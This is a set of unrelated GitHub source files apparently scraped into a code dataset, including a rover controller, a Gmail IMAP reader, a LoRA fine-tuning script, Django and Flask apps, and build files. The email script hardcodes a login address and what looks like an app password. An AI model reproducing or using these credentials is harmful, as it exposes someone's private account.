check_vel_max(self):\n if self.rover.vel < -self.rover.max_vel:\n return False\n else:\n return True\n\n def run(self):\n self.rover.steer = 0\n self.rover.throttle = 0\n\n def next(self):\n if self.rover.picking_up:\n return Stop(self.rover)\n self.times += 1\n if self.times >= 1:\n if self.times >= 35:\n self.rover.throttle = 0.0\n self.times = 0\n return Stop(self.rover)\n else:\n if self.check_vel_max():\n self.rover.throttle = -0.1\n else:\n self.rover.throttle = 0\n return self\n return self\n\n\nclass Rock(Go):\n def __init__(self, rover):\n self.rover = rover\n self.distance = 0\n self.angle = 0\n self.iteration = 0\n self.bearing = 0\n self.start_time = 0\n\n def __str__(self):\n return 'Rock'
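\n # Rock-approach state: slow the rover down, keep steering toward the detected\n # sample, and trigger the pickup once the rover reports near_sample.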
\n\n def update_rock_data(self):\n self.distance = distance_to_rock(self.rover)\n if self.distance != 0:\n self.angle = rad2deg(np.mean(self.rover.rock_angles))\n\n def check(self):\n # If in a state where we want to pick up a rock, send the pickup command\n if self.rover.near_sample:\n self.rover.throttle = 0\n self.rover.brake = self.rover.brake_set\n if self.rover.vel == 0 and not self.rover.picking_up:\n self.rover.send_pickup = True\n while self.rover.picking_up:\n print('picking up')\n self.rover.rock_detected = False\n self.rover.max_vel = 1\n return True\n else:\n self.rover.brake = self.rover.brake_set\n return False\n else:\n return False\n\n def putting_rock_infront(self):\n if abs(self.angle) > 25:\n self.bearing = self.angle\n self.rover.steer = np.clip(self.bearing, -15, 15, out=None)\n else:\n self.rover.steer = 0\n\n def go(self):\n if self.rover.vel > self.rover.max_vel:\n self.rover.throttle = 0\n else:\n self.rover.throttle = 0.1\n\n def run(self):\n # self.delay(100)\n self.rover.max_vel = 0.5\n self.update_rock_data()\n # self.putting_rock_infront()\n # self.first_angle = self.angle\n\n def next(self):\n self.update_rock_data()\n if self.distance == 0:\n self.iteration += 1\n self.rover.steer = np.clip(self.bearing, -15, 15)\n self.go()\n if self.iteration >= 5:\n self.rover.max_vel = 1\n self.rover.rock_detected = False\n self.iteration = 0\n return Go(self.rover, throttle=0.1)\n else:\n return self\n else:\n self.iteration = 0\n print('distance:', self.distance)\n print('angle: ', self.angle)\n self.go()\n self.putting_rock_infront()\n if self.check():\n if self.rover.samples_to_find == 0:\n return Stop(self.rover)\n else:\n if np.sign(self.bearing):\n turn = 'right'\n else:\n turn = 'left'\n return SearchClearPath(self.rover, turn)\n else:\n if self.stuck():\n self.putting_rock_infront()\n return Stuck(self.rover)\n else:\n return self\n\n\nclass ReturnHome(Go):\n def __init__(self, rover):\n self.rover = rover\n self.home = self.rover.pos\n self.front_area = 0\n\n def __str__(self):\n return 'ReturnHome'\n\n def bearing_to_home_position(self):\n x = self.rover.pos[0] - self.home[0]\n y = self.rover.pos[1] - self.home[1]\n bearing = rad2deg(np.arctan2(y, x))\n return bearing\n\n def update_steering(self):\n min_nav_angle = rad2deg(np.min(self.rover.nav_angles)) + 45\n max_nav_angle = rad2deg(np.max(self.rover.nav_angles)) - 45\n min_obs_angle = rad2deg(np.min(self.rover.nav_angles)) + 45\n max_obs_angle = rad2deg(np.max(self.rover.nav_angles)) - 45\n\n min_angle = max(min_nav_angle, min_obs_angle)\n max_angle = min(max_nav_angle, max_obs_angle)\n\n self.rover.steer = np.clip(self.bearing_to_home_position(),\n min_angle, max_angle)\n self.front_area = is_obstacle_ahead(\n self.rover, range=30, bearing=self.bearing_to_home_position())\n\n def run(self):\n pass\n\n def next(self):\n if self.rover.samples_to_find == 0:\n self.rover.go_home = True\n print('area: ', len(self.rover.nav_angles))\n print('front area:', self.front_area)\n if self.check_area_stop(): # and is_obstacle_ahead(self.rover) ==\n self.update_steering()\n self.check_vel_max()\n if self.front_area > 150:\n return Stop(self.rover)\n if self.stuck():\n return Stuck(self.rover)\n else:\n return self\n else:\n return Stop(self.rover)\n else:\n return Go(self.rover, 
throttle=0.1)\n","repo_name":"juancruzgassoloncan/Udacity-Robo-nanodegree","sub_path":"src/rover/project/code/rover_sates.py","file_name":"rover_sates.py","file_ext":"py","file_size_in_byte":11792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"30103498399","text":"import datetime\r\nx = datetime.datetime.now() - datetime.timedelta(1) #yesterday date\r\nyesterday = x.strftime(\"%d\")+\"-\"+x.strftime(\"%B\")+\"-\"+x.strftime(\"%Y\") #yesterday date, nicely formatted\r\n\r\n#SMTP --> sending emails (to server)\r\n#IMAP (and pop3) --> receiving emails (from server)\r\n#pop3 = move emails from server to client\r\n#imap = copy emails from server to client\r\n\r\nimport imapclient\r\nimport webbrowser\r\nconn = imapclient.IMAPClient('imap.gmail.com' , ssl=True)\r\nconn.login('nimaahmadvand28@gmail.com' , 'xskpizckmmcuhswv')\r\nconn.select_folder('INBOX' , readonly=True)\r\n#UIDs = conn.search([\"SINCE \"+yesterday])\r\n#UIDs = conn.search(['NOT DELETED'])\r\nUIDs = conn.search(['FROM', 'support@mega.nz'])\r\nprint (UIDs)\r\nUID = int(input(\"select one: \"))\r\nrawMessage = conn.fetch([UID] , ['BODY[]' , 'FLAGS'])\r\n\r\nf = open('mail.html','wb')\r\nf.write(rawMessage[UID][b'BODY[]'])\r\nf.close()\r\nwebbrowser.open_new_tab('mail.html')\r\n\r\n#import pyzmail #easy_install pyzmail\r\n#message = pyzmail.PyzMessage.factory(rawMessage[UID][b'BODY[]'])\r\n#print (message)","repo_name":"nimaahmadvand/python","sub_path":"receiving-emails.py","file_name":"receiving-emails.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"532879926","text":"#Load the FLAN-T5-XL model\n\nimport os\nimport torch\nimport torch.nn as nn\nfrom datasets import load_dataset\nfrom transformers import AutoModelForSeq2SeqLM, AutoTokenizer\nmodel_name = \"google/flan-t5-xl\"\nmodel = AutoModelForSeq2SeqLM.from_pretrained(model_name, load_in_8bit=True)\ntokenizer = AutoTokenizer.from_pretrained(model_name)\n\n#prepare the model for 8-bit training\n\nfrom peft import prepare_model_for_int8_training\nmodel = prepare_model_for_int8_training(model)\n\n# set up the LoRA configuration for training\n\nfrom peft import LoraConfig, get_peft_model, TaskType\n\n\ndef print_trainable_parameters(model):\n \"\"\"\n Prints the number of trainable parameters in the model.\n \"\"\"\n trainable_params = 0\n all_param = 0\n for _, param in model.named_parameters():\n all_param += param.numel()\n if param.requires_grad:\n trainable_params += param.numel()\n print(\n f\"trainable params: {trainable_params} || all params: {all_param} || trainable%: {100 * trainable_params / all_param}\"\n )\n\n\nlora_config = LoraConfig(\n r=16, lora_alpha=32, target_modules=[\"q\", \"v\"], lora_dropout=0.05, bias=\"none\", task_type=\"SEQ_2_SEQ_LM\"\n)\n\nmodel = get_peft_model(model, lora_config)\nmodel = nn.DataParallel(model,device_ids = [0,1,2])\nprint_trainable_parameters(model)\n\n#Load the dataset and pre-process\n\ndataset_id = \"Pretam/hi-kn\" ##\"cnn_dailymail\" # Hugging Face Dataset Id\ndataset_config = \"3.0.0\" # config/version of the dataset\n#save_dataset_path = sys.argv[2] # local path to save processed dataset\ntext_column = \"source\" # column of the input text\nsummary_column = \"target\" # column of the output text\n# custom instruct prompt start\n# prompt_template = f\"Summarize the following news article:\\n{{input}}\\nSummary:\\n\"\nprompt_template = f\"Translate Hindi to Kannada:\\n {{input}}\\nTranslation:\\n\"\n\n
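\n# Only the LoRA adapters on the q and v attention projections are trained here,\n# which is why the trainable-parameter count printed above is a small fraction of the model.\n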
\n# Load dataset from the hub\ndataset = load_dataset(dataset_id,name=dataset_config)\n# Load the tokenizer of FLAN-T5-XL\ntokenizer = AutoTokenizer.from_pretrained(model_name)\n\n\nprint(f\"Train dataset size: {len(dataset['train'])}\")\nprint(f\"Test dataset size: {len(dataset['test'])}\")\n\nprompt_length = len(tokenizer(prompt_template.format(input=\"\"))[\"input_ids\"])\nmax_sample_length = tokenizer.model_max_length - prompt_length\nprint(f\"Prompt length: {prompt_length}\")\nprint(f\"Max input length: {max_sample_length}\")\n\n\nfrom datasets import concatenate_datasets\nimport numpy as np\n# The maximum total input sequence length after tokenization. \n# Sequences longer than this will be truncated, sequences shorter will be padded.\ntokenized_inputs = concatenate_datasets([dataset[\"train\"], dataset[\"test\"]]).map(lambda x: tokenizer(x[text_column], truncation=True), batched=True, remove_columns=[text_column, summary_column])\nmax_source_length = max([len(x) for x in tokenized_inputs[\"input_ids\"]])\nmax_source_length = min(max_source_length, max_sample_length)\nprint(f\"Max source length: {max_source_length}\")\n \n# The maximum total sequence length for target text after tokenization. \n# Sequences longer than this will be truncated, sequences shorter will be padded.\ntokenized_targets = concatenate_datasets([dataset[\"train\"], dataset[\"test\"]]).map(lambda x: tokenizer(x[summary_column], truncation=True), batched=True, remove_columns=[text_column, summary_column])\ntarget_lengths = [len(x) for x in tokenized_targets[\"input_ids\"]]\n# use 95th percentile as max target length\nmax_target_length = int(np.percentile(target_lengths, 95))\nprint(f\"Max target length: {max_target_length}\")\n\n\n\ndef preprocess_function(sample, padding=\"max_length\"):\n\n inputs = [prompt_template.format(input=item) for item in sample[text_column]]\n model_inputs = tokenizer(inputs, max_length=tokenizer.model_max_length, padding=padding, truncation=True)\n\n labels = tokenizer(text_target=sample[summary_column], max_length=max_target_length, padding=padding, truncation=True)\n\n if padding == \"max_length\":\n labels[\"input_ids\"] = [[(l if l != tokenizer.pad_token_id else -100) for l in label] for label in labels[\"input_ids\"]]\n model_inputs[\"labels\"] = labels[\"input_ids\"]\n return model_inputs\n\ntokenized_dataset = dataset.map(preprocess_function, batched=True, remove_columns=list(dataset[\"train\"].features))\ntrain_data=tokenized_dataset[\"train\"]\ntest_data=tokenized_dataset[\"test\"]\nprint(\"generation_max_length : \",max_target_length)\n\n\n\n#load the model and train\n\n\nfrom transformers import TrainingArguments, Trainer\n\ntraining_args = TrainingArguments(\n \"temp\",\n evaluation_strategy=\"epoch\",\n learning_rate=1e-3,\n gradient_accumulation_steps=1,\n auto_find_batch_size=True,\n num_train_epochs=3,\n save_steps=1000,\n save_total_limit=8,\n per_device_train_batch_size=64\n)\ntrainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=train_data,\n eval_dataset=test_data,\n)\n# model.config.use_cache = False\n\ntrainer.train()\n\nlora_model_id = \"results\"\ntrainer.model.save_pretrained(lora_model_id)\ntokenizer.save_pretrained(lora_model_id)\n","repo_name":"ShrinivasSK/NMT","sub_path":"lora_flan_t5_xl.py","file_name":"lora_flan_t5_xl.py","file_ext":"py","file_size_in_byte":4996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23291522704","text":"import secrets\nimport string\nfrom datetime import 
timedelta, date\n\nfrom django.core.management.base import BaseCommand\nimport random\nfrom library.models import Book, Library, Author\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n for i in range(1000):\n\n Library.objects.create(\n library_name=''.join(secrets.choice(string.ascii_uppercase + string.digits) for i in range(5)),\n address=''.join(secrets.choice(string.ascii_uppercase + string.digits) for i in range(15)),\n capacity=random.randint(1, 9223372036854775807)\n )\n\n start_date = date(1812, 1, 1)\n end_date = date(2005, 12, 31)\n time_between_dates = end_date - start_date\n days_between_dates = time_between_dates.days\n random_number_of_days = random.randrange(days_between_dates)\n random_date = start_date + timedelta(days=random_number_of_days)\n\n Author.objects.create(\n author_name=''.join(secrets.choice(string.ascii_uppercase + string.digits) for i in range(7)),\n date_of_birth=random_date\n )\n\n first_author_id = Author.objects.values('id').first()['id']\n last_author_id = Author.objects.values('id').last()['id']\n first_library_id = Library.objects.values('id').first()['id']\n last_library_id = Library.objects.values('id').last()['id']\n\n Book.objects.create(\n name=''.join(secrets.choice(string.ascii_uppercase + string.digits) for _ in range(15)),\n publication_year=random.randint(1890, 2021),\n library_id=Library.objects.get(id=random.randint(first_library_id, last_library_id))).\\\n authors_names.add(Author.objects.get(id=random.randint(first_author_id, last_author_id)))\n","repo_name":"VMerk8/ZeptoTest","sub_path":"library/management/commands/add_libraries_books_authors.py","file_name":"add_libraries_books_authors.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39257412381","text":"def map_columns(input):\n results = []\n for data in input[\"data\"]:\n result = {}\n for key, value in data.items():\n mapped_key = None\n for column_map in input[\"mapping\"]:\n if column_map['column'] == key:\n mapped_key = column_map['desired_column']\n break\n\n if mapped_key is not None:\n mapped_value = value\n\n # Check if a character needs to be replaced\n replace_characters = column_map.get('replace_characters')\n if replace_characters:\n for old, new in replace_characters.items():\n mapped_value = mapped_value.replace(old, new)\n\n value_mapping = column_map.get('value_mapping')\n if value_mapping:\n if value in value_mapping:\n mapped_value = value_mapping[value]\n else:\n mapped_value = value_mapping[\"fallback\"]\n\n concatenate_order = column_map.get('concatenate_order')\n\n if concatenate_order:\n concatenate_value = ''\n for order_item in concatenate_order:\n if 'column' in order_item and order_item['column'] in data:\n concatenate_value += str(data[order_item['column']])\n\n if 'string' in order_item:\n concatenate_value += order_item['string']\n\n mapped_value = concatenate_value\n \n # Check if needs to be a required value\n required_values = column_map.get('required_values')\n if required_values and value not in required_values:\n break\n\n result[mapped_key] = mapped_value\n\n # Check for required fields\n missing_fields = [column_map['desired_column'] for column_map in input[\"mapping\"] if column_map.get('required', False) and column_map['desired_column'] not in result]\n \n # Check required values are not empty\n empty_fields = [column_map['desired_column'] for column_map in input[\"mapping\"] if column_map.get('required', False) 
and column_map['desired_column'] in result and not result[column_map['desired_column']]]\n \n if not missing_fields and not empty_fields:\n results.append(result)\n return results\n\n# Example dictionary and mapping\ninput = {\n \n}\ninput[\"data\"] = [\n {\n \"MemberNumber\": \"3177663559\",\n \"Action\": \"LOGIN\",\n \"ReplaceMe\":\"P1000\",\n \"Account\":\"1000\",\n \"Suffix\":\"S\"\n }\n]\n\ninput[\"mapping\"] = [\n {\n \"column\": \"MemberNumber\",\n \"desired_column\": \"unique_id\",\n \"required\": True\n },\n {\n \"column\": \"Action\",\n \"value_mapping\": {\n \"LOGIN\": True,\n \"fallback\": False\n },\n \"desired_column\": \"online-banking\",\n \"required\": True\n },\n {\n \"column\": \"ReplaceMe\",\n \"replace_characters\": {\n \"P\": \"\"\n },\n \"desired_column\": \"account_number\",\n \"required\": True\n },\n {\n \"column\": \"Account\",\n \"concatenate_order\": [\n {\n \"column\":\"Account\"\n },\n {\n \"column\":\"Suffix\"\n },\n {\n \"string\":\"L\"\n }\n ],\n \"desired_column\": \"account_number\",\n \"required\": True\n }\n ]\n\n# Map columns\nmapped_data = map_columns(input)\n\n# Print the mapped input[\"data\"]\nprint(mapped_data)\n","repo_name":"shawnhasten2/Tray-Work","sub_path":"COFCU/validateDataV1.py","file_name":"validateDataV1.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5890959185","text":"from django.shortcuts import render\n\nbooks = [\n {\n \"id\": \"1\",\n \"editorial\": \"Editorial 1\",\n \"pais\": \"Chile\",\n \"fecha\": \"2021-10-10\",\n \"autor\": \"Juan\",\n \"titulo\": \"El libro de Juan\",\n \"descripcion\": \"Este es el libro de Juan\",\n \"materia\": \"Matematicas\",\n \"año\": \"2021\", \n },\n {\n \"id\": \"2\",\n \"editorial\": \"Editorial 2\",\n \"pais\": \"Cuba\",\n \"fecha\": \"2021-11-10\",\n \"autor\": \"Ari\",\n \"titulo\": \"El libro de Ari\",\n \"descripcion\": \"Este es el libro de Ari\",\n \"materia\": \"Lenguaje\",\n \"año\": \"2022\", \n },\n {\n \"id\": \"3\",\n \"editorial\": \"Editorial 2\",\n \"pais\": \"Cuba\",\n \"fecha\": \"2021-11-10\",\n \"autor\": \"Ari\",\n \"titulo\": \"El 2do libro de Ari\",\n \"descripcion\": \"Este es el libro de Ari 2\",\n \"materia\": \"Programacion\",\n \"año\": \"2022\", \n },\n {\n \"id\": \"4\",\n \"editorial\": \"Editorial 1\",\n \"pais\": \"Chile\",\n \"fecha\": \"2021-10-10\",\n \"autor\": \"Alberto\",\n \"titulo\": \"El libro de Alberto\",\n \"descripcion\": \"Este es el libro de Alberto\",\n \"materia\": \"Matematicas\",\n \"año\": \"2021\", \n },\n]\n\nprestados = [{\n \"id_libro\": \"1\",\n \"fecha_devolucion\": \"2021-10-10\",\n \"fecha_prestamo\": \"2021-10-10\",\n}]\n\ndef index(request):\n return render(request, \"home.html\")\n\ndef all(request):\n return render(request, \"books.html\",{\"books\":books})\n\ndef book(request):\n id = request.GET.get(\"id\") \n partial = filter(lambda e: e[\"id\"] == id,books)\n partial = list(partial)\n return render(request, \"book.html\",{\"books\":partial})\n\ndef materia(request):\n materia = request.GET.get(\"materia\")\n partial = filter(lambda e: e[\"materia\"] == materia,books) # SQL query against the DB\n return render(request, \"books.html\",{\"books\":partial})\n\ndef autor(request):\n autor = request.GET.get(\"autor\")\n partial = filter(lambda e: e[\"autor\"] == autor,books)\n return render(request, \"books.html\",{\"books\":partial})\n\ndef prestado(request):\n
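 # Collect the ids of loaned books, then keep only the books whose id is in that set.\n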
filter(lambda e: e[\"id\"] in prestaSet ,books) #SQL a la BD\n partial = list(partial)\n return render(request, \"books.html\",{\"books\":partial})","repo_name":"odtorres/biblioteca-ary","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36417660080","text":"# Inheritence\n\nclass Employee():\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def add(Self, para1):\n name = \"abcdedf\"\n print(\"Add Employee Method\", para1, Self.name, \" and without self\", name)\n\nclass EmployeeHR(Employee):\n def __init__(self, name, age, hireby):\n super().__init__(name, age)\n self.hireby = hireby\n\n\nemployee2 = EmployeeHR('xyz', 40, 'faisal')\n\nprint(employee2.name)\nprint(employee2.age)\n\nemployee2.add(\"Employee 2\")\n\n \n","repo_name":"salirazakazmi/PythonBasics","sub_path":"ProjectwithVirtualEnviroment/OOPexp.py","file_name":"OOPexp.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4159997979","text":"# В массиве случайных целых чисел поменять местами минимальный и максимальный элементы.\n\n\nfrom random import randint\n\n# параметры массива случайных чисел\nMIN_RND = 10\nMAX_RND = 200\nSIZE = 15\n\n# создание и заполнение массива\nbefore_mas = [randint(MIN_RND, MAX_RND) for _ in range(SIZE)]\n\n# переменные мин., макс, и их индексы изначально соответствуют нулевому элементу массива\nminimum, maximum = before_mas[0], before_mas[0]\nmin_index, max_index = 0, 0\n\n# поиск минимума и максимума в массиве перебором, сохранение их инджексов\nfor i, item in enumerate(before_mas):\n if item < minimum:\n minimum = item\n min_index = i\n if item > maximum:\n maximum = item\n max_index = i\n\n# копия массива, замена мин. и макс, местами\nafter_mas = before_mas[:]\nafter_mas[min_index], after_mas[max_index] = after_mas[max_index], after_mas[min_index]\n\nprint(f'Мин: {minimum}. Макс: {maximum}. 
Indexes: {min_index}, {max_index}.')\nprint('The array before and after swapping min and max, respectively:')\nprint(before_mas)\nprint(after_mas)\n","repo_name":"aechernenko/gbu_ai","sub_path":"Algorithms/lesson_3/les_3_task_3.py","file_name":"les_3_task_3.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21076396543","text":"import tkinter as tk\n\n# Import the functions from the data-insertion and data-search applications\nfrom adicionar import adicionar\nfrom pesquisar import pesquisar\n\nroot = tk.Tk()\nroot.title('Gerenciamento de Dados')\n\nmenu = tk.Menu(root)\nroot.config(menu=menu)\n\ninserir_menu = tk.Menu(menu)\npesquisar_menu = tk.Menu(menu)\nmenu.add_cascade(label='Inserir', menu=inserir_menu)\nmenu.add_cascade(label='Pesquisar', menu=pesquisar_menu)\ninserir_menu.add_command(label='Inserir Dados', command=adicionar)\npesquisar_menu.add_command(label='Pesquisar Dados', command=pesquisar)\n\n# The direct calls to the data-insertion and data-search applications were removed\n#adicionar()\n#pesquisar()\n\nroot.mainloop()\n","repo_name":"ricardoviannajr/SICONTRAR","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18962379341","text":"# -*- mode:python -*-\n\nimport os\nImport(\"env\")\n\ncommonSrcs = [\"config.cpp\", \"galloc.cpp\", \"log.cpp\", \"pin_cmd.cpp\"]\nharnessSrcs = [\"zsim_harness.cpp\", \"debug_harness.cpp\"]\n\n# By default, we compile all cpp files in libzsim.so. List the cpp files that\n# should be excluded below (one per line and in order, to ease merges)\nexcludeSrcs = [\n\"fftoggle.cpp\",\n]\nexcludeSrcs += harnessSrcs\n\n# Build libzsim.so\nglobSrcNodes = Glob(\"*.cpp\") + Glob(\"virt/*.cpp\")\nlibSrcs = [str(x) for x in globSrcNodes if str(x) not in excludeSrcs]\nlibSrcs.append(env[\"NVMAINSOURCES\"])\nlibEnv = env.Clone()\nlibEnv[\"CPPFLAGS\"] += libEnv[\"PINCPPFLAGS\"]\nlibEnv[\"LINKFLAGS\"] += libEnv[\"PINLINKFLAGS\"]\nlibEnv[\"LIBPATH\"] += libEnv[\"PINLIBPATH\"]\nlibEnv[\"LIBS\"] += libEnv[\"PINLIBS\"]\nlibEnv.SharedLibrary(\"zsim.so\", libSrcs)\n\n# Build harness (static to make it easier to run across environments)\nenv[\"LINKFLAGS\"] += \" --static \"\nenv[\"LIBS\"] += [\"pthread\"]\nenv.Program(\"zsim\", harnessSrcs + commonSrcs)\n\n# Build additional utilities below\nenv.Program(\"fftoggle\", [\"fftoggle.cpp\"] + commonSrcs)\n","repo_name":"AXLEproject/axle-zsim-nvmain","sub_path":"src/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"66"} +{"seq_id":"19632807895","text":"from django.db import models\n\nclass Evento (models.Model):\n    nome = models.CharField(max_length=30, null=False)\n\n    def __str__(self):\n        return str(self.id) + '-' + self.nome\n    \nclass ComunicadoCliente (models.Model):\n    id = models.AutoField(primary_key = True, auto_created=True)\n    cpf = models.CharField(max_length=11, null=False)\n    nome = models.CharField(max_length=80, null=False)\n    email = models.EmailField(max_length=100, null=False)\n    evento = models.ForeignKey(Evento, on_delete=models.PROTECT, related_name=\"evento\")\n    lavoura_lat = models.FloatField(null=False)\n    lavoura_lon = models.FloatField(null=False)\n    lavoura_tipo = models.SmallIntegerField(null=False)\n    lavoura_data_colheita = models.DateTimeField()\n    inserted_at = 
models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n is_active = models.BooleanField(default=True)\n\n def __str__(self):\n return self.nome + \" - \" + self.cpf\n","repo_name":"Regismrs/proagro-cps-backend","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5255831206","text":"import os\nimport sys\n\nTASKS = [\n 'emoji',\n 'emotion',\n 'hate',\n 'irony',\n 'offensive',\n 'sentiment',\n 'stance']\n\nSTANCE_TASKS = [\n 'abortion',\n 'atheism',\n 'climate',\n 'feminist',\n 'hillary']\n\n\ndef predict(args):\n cmd = '''python ./class.py \\\n --model_name_or_path {args[model_name_or_path]} \\\n --cache_dir ../../.cache \\\n --do_predict \\\n --use_fast_tokenizer \\\n --per_device_train_batch_size 4 \\\n --per_device_eval_batch_size 4 \\\n --gradient_accumulation_steps 2 \\\n --test_file {args[test_file]} \\\n --task_name {args[task_name]} \\\n --output_dir {args[output_dir]}'''.format(args=args)\n os.system(cmd)\n\n\ndef main():\n root = sys.argv[2]\n model = sys.argv[1]\n run_args = {}\n for task in TASKS:\n if task == 'stance':\n for st in STANCE_TASKS:\n run_args['test_file'] = os.path.join('../ds/tweeteval/datasets/', task, st, 'test.csv')\n run_args['model_name_or_path'] = os.path.join('../../', model, task, st) + '/'\n run_args['output_dir'] = os.path.join(root, task)\n run_args['task_name'] = st\n predict(args=run_args)\n else:\n run_args['test_file'] = os.path.join('../ds/tweeteval/datasets/', task, 'test.csv')\n run_args['model_name_or_path'] = os.path.join('../../', model, task) + '/'\n run_args['output_dir'] = os.path.join(root)\n run_args['task_name'] = task\n predict(args=run_args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"HolmiumTS/ppppplm","sub_path":"class/tweeteval_predict.py","file_name":"tweeteval_predict.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"37402221595","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom flask_restful import Api, Resource\nfrom DB import DB\nfrom InteractionCheck.DrugIdentifier import DrugIdentifier\nfrom InteractionCheck.DrugInteractions import DrugInteractions\nfrom validator.drug_validator import check_drug\n\napp = Flask(__name__)\ncors = CORS(app)\napi = Api(app)\n\n\n# suggestions for drug names when searching for one\nclass DrugSuggestions(Resource):\n def get(self):\n data_base = DB()\n drug_list = data_base.fetch_all_data(\n \"SELECT english_name,hebrew_name FROM drug_name\", '')\n english_hebrew = {}\n for drug in drug_list:\n english_name = drug[0].split()[0]\n hebrew_name = drug[1].split()[0]\n if english_name not in english_hebrew and hebrew_name not in english_hebrew:\n english_hebrew[english_name] = hebrew_name\n drug_list_dict = []\n dict = {}\n for english_name, hebrew_name in english_hebrew.items():\n dict['name'] = english_name + ' / ' + hebrew_name\n drug_list_dict.append(dict.copy())\n data_base.close_connection()\n print(drug_list_dict)\n return jsonify(drug_list_dict)\n\n\n# check interaction between drugs\nclass InteractionCheck(Resource):\n def get(self):\n drugs_sent = request.args\n drug_list = [drug.split(\" / \")[0] for drug in list(drugs_sent.keys())]\n drug_objects = []\n for drug in drug_list:\n drug_objects.append(DrugIdentifier(drug))\n interaction = 
DrugInteractions(drug_objects)\n        return jsonify(interaction.interaction_results)\n\n\n# get stats of interactions\nclass InteractionStats(Resource):\n    def get(self):\n        stats = {}\n        stats['symptoms'] = {}\n        stats['report_num'] = 0\n        stats['severity'] = {}\n        stats['severity']['sever'] = 0\n        stats['severity']['notSever'] = 0\n\n        drugs_sent = request.args\n        drug_list = [drug.split(\" / \")[0] for drug in list(drugs_sent.keys())]\n\n        drug_objects = []\n\n        for drug in drug_list:\n            drug_objects.append(DrugIdentifier(drug))\n\n        drug_heb_eng_names = []\n        for obj in drug_objects:\n            drug_heb_eng_names.append(obj.drug_english_name)\n            drug_heb_eng_names.append(obj.drug_hebrew_name)\n        data_base = DB()\n        symptoms_stats = data_base.fetch_all_data(\n            \"SELECT drugs,symptoms,severity FROM report_details WHERE serial>6\", '')\n        print(symptoms_stats)\n        for element in symptoms_stats:\n            set1 = set(element[0])\n            set2 = set(drug_heb_eng_names)\n            if len(set1.intersection(set2)) != 0 and len(set1.intersection(set2)) == len(set2) / 2:\n                check = True\n            else:\n                check = False\n            if check and len(list(drugs_sent.keys())) / len(element[0]) >= 0.6:\n                stats['report_num'] += 1\n                for symptom in element[1]:\n                    if symptom not in stats['symptoms']:\n                        stats['symptoms'][symptom] = 0\n                    stats['symptoms'][symptom] += 1\n                for severity in element[2]:\n                    if severity != \"\":\n                        stats['severity'][severity] += 1\n        print(stats)\n        data_base.close_connection()\n\n        return jsonify(stats)\n\n\n# get stats of one drug\nclass SearchStats(Resource):\n    def get(self):\n        stats = {}\n        stats['symptoms'] = {}\n        stats['report_num'] = 0\n        stats['severity'] = {}\n        stats['severity']['sever'] = 0\n        stats['severity']['notSever'] = 0\n\n        drug_sent = request.args\n        drug_sent = list(drug_sent.keys())\n        data_base = DB()\n\n        symptoms_stats = data_base.fetch_all_data(\n            \"SELECT drugs,symptoms,severity FROM report_details WHERE serial>6\", '')\n        for element in symptoms_stats:\n            if drug_sent[0] in element[0] or drug_sent[1] in element[0]:\n                stats['report_num'] += 1\n                for symptom in element[1]:\n                    if symptom not in stats['symptoms']:\n                        stats['symptoms'][symptom] = 0\n                    stats['symptoms'][symptom] += 1\n                for severity in element[2]:\n                    if severity != \"\":\n                        stats['severity'][severity] += 1\n        data_base.close_connection()\n        print(stats)\n        return jsonify(stats)\n\n\n# look up details for a single drug\nclass DrugSearch(Resource):\n    def get(self):\n        drug_sent = list(request.args.keys())[0]\n        drug_sent = drug_sent.split(\" / \")[0]\n        drug_details = DrugIdentifier(drug_sent)\n        print(drug_details.build_search_answer())\n        return jsonify(drug_details.build_search_answer())\n\n\n# record a suggestion for a new drug\nclass NewDrug(Resource):\n    def post(self):\n        drug_sent = request.get_json(force=True)\n        print(drug_sent['commercialName'], drug_sent['genericName'], drug_sent['useForm'])\n        check = check_drug(drug_sent['commercialName'], drug_sent['genericName'])\n        if check is False:\n            new_drug_data = (drug_sent['commercialName'], drug_sent['genericName'], drug_sent['useForm'])\n            data_base = DB()\n            postgres_insert_query = \"\"\" INSERT INTO new_drug_suggest (commercialName, genericName,useForm)\\\n            VALUES (%s,%s,%s)\"\"\"\n            data_base.insert_data_row(postgres_insert_query, new_drug_data)\n            data_base.close_connection()\n\n\nclass SideEffectReport(Resource):\n    def post(self):\n        real = True\n        drug_sent = request.get_json(force=True)\n        print(drug_sent)\n        user_data = (drug_sent['factorName'], drug_sent['email'], drug_sent['phoneNumber'], drug_sent['sector'],\n                     drug_sent['medicalSector'], real)\n        
